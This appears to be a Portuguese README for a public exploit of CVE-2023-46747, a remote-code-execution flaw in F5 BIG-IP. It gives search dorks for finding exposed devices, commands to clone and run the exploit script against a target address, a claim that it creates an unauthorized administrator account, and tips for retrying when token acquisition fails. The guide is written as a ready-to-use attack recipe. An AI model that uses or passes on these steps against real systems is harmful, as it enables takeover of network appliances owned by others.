CVE 2023 46747 RCE

 (title="BIG-IP®" || icon_hash="-335242539")

 title:"BIG-IP®"

https://my.f5.com/manage/s/article/K000137353

1. Neste momento, o usuário aqui é apenas admin :

2. Execute o script:

 git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
cd CVE-2023-46747-RCE
pip install -r requirements.txt
python CVE-2023-46747-RCE.py -u https://192.168.161.190
# python CVE-2023-46747-RCE.py -u https://192.168.161.190 -p http://127.0.0.1:7890

Comando executado com sucesso:

3. Um novo usuário foi criado com sucesso sem autorização aqui:

A exploração falha em algumas versões, referência: https://twitter.com/joel_land/status/1729147886615818732.

1. P: A aquisição do token falhou?
   R: Não se pode dizer que não deve haver vulnerabilidade no site de teste, pois criar um usuário sem autorização não é 100% bem-sucedido. Às vezes, você não cria um usuário na primeira etapa por alguns motivos, então o token na segunda etapa não pode ser obtido. Portanto, minha sugestão é tentar mais algumas vezes. Se não funcionar, pode significar que realmente não há vulnerabilidade.

Você pode usar este script https://github.com/BishopFox/bigip-scanner para coletar informações da versão do F5 BIG-IP. É ótimo!

descoberta de projeto/modelos de núcleos#8500
https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg
https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747